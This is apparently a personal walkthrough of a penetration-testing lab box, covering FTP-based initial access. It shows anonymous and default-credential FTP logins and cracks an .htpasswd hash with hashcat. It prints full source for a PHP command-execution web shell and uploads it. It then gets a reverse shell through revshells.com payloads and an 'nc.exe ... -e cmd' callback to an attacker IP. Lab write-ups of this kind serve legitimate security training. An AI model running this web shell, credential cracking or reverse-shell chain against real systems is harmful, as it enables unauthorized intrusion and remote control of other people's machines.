ftp 21 [initial Access]

Checking FTP:

ftp $authby

anonymous
anonymous

I will check log folder first.

There is lots of log present. Let's downlaod it to the kali linux.

cd log
ls

unable to download file though anonymous user ftp. Getting access denied.

Then i listed accounts directory and found that there is one admin account.

cd accounts
ls

I tried to login using admin:admin and offsec:offsec in FTP.

Admin password worked but offsec failed.

Downlaoded index.php but nothing import found inside it.

Looking at .htpasswd file

This revealed the password of offsec.

cat .htpasswd
offsec:$apr1$oRfRsc/K$UpYpplHDlaemqseM39Ugg0

cat .htpasswd > hash.txt

I will be cracking the password.

hashcat -m 1600 --username hash.txt /usr/share/wordlists/rockyou.txt --force

Cracked.

$apr1$oRfRsc/K$UpYpplHDlaemqseM39Ugg0:elite

In backup there, I can see that there is .uac file.

.uac file prevent unauthorized modification.

This means if I delete this file, then i can download the file to my kali linux.

FTP to RCE [Worked]:

As i have FTP on the root directory of website. I will uplaod the reverse shell file and get the shell.

ftp $authby
admin
admin

Tried PHP reverse shell from pentest monkey and Ivan sincek but didn't work.

We can see there is .php file present. I will add this php file to execute the command.

<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
    if(isset($_GET['cmd']))
    {
        system($_GET['cmd']);
    }
?>
</pre>
</body>
<script>document.getElementById("cmd").focus();</script>
</html>

Uplaod this to the ftp of admin.

put shell.php

http://192.168.117.46:242/shell.php?cmd=id

visit this page and run the command as needed.

First let's find which type of shell it is using cmd or powershell.

(dir 2>&1 *`|echo CMD);&<# rem #>echo PowerShell

it is using CMD.

Uploading reverse shell [Worked].

I will be using reverse shell website for makinga reverse shell.

curl "https://www.revshells.com/PHP%20Ivan%20Sincek?ip=192.168.45.183&port=21&shell=cmd&encoding=cmd" -o shell.php

In ftp, run below command to uplaod the file.

put shell.php

Run curl command in terminal of kali linux after starting listener.

sudo rlwrap -cAr nc -lvnp 21

curl "http://$authby:242/shell.php" -u offsec:elite

Got the shell !!

I got the shell using PHP reverse shell but unable to run the exe file using this. I tried during my privilege escalation method.

Using nc [working]

Other way using NC

First, find out the net cat in Kali Linux.

Make sure you add php backdoor and not reverse shell file.

curl "https://www.revshells.com/PHP%20cmd%202?ip=192.168.45.191&port=21&shell=cmd&encoding=cmd" -o shell.php

Copy it to the current working directory and then upload it to the web directory using ftp.

Now we will run command and check if we are able to run the command or not.

Great !! It's working. We will now get the shell using nc.exe tool.

Start the listener.

sudo rlwrap -cAr nc -lvnp 21

# For getting shell, we will use below command:
nc.exe 192.168.45.191 21 -e cmd

URL Encoding the command:

hURL --URL "nc.exe 192.168.45.191 21 -e cmd"

--
Original    :: nc.exe 192.168.45.191 21 -e cmd
URL ENcoded :: nc.exe%20192.168.45.191%2021%20-e%20cmd

Final command to run:

curl "http://$authby:242/shell.php?cmd=nc.exe%20192.168.45.191%2021%20-e%20cmd" -u offsec:elite

Got the shell.

PreviousLooking for Public exploit Nextport 242

Last updated 1 year ago

Was this helpful?

hashtagChecking FTP:

hashtagLogin using offsec credential

hashtagFTP to RCE [Worked]:

hashtagUploading reverse shell [Worked].

hashtagUsing nc [working]

Checking FTP:

Login using offsec credential

FTP to RCE [Worked]:

Uploading reverse shell [Worked].

Using nc [working]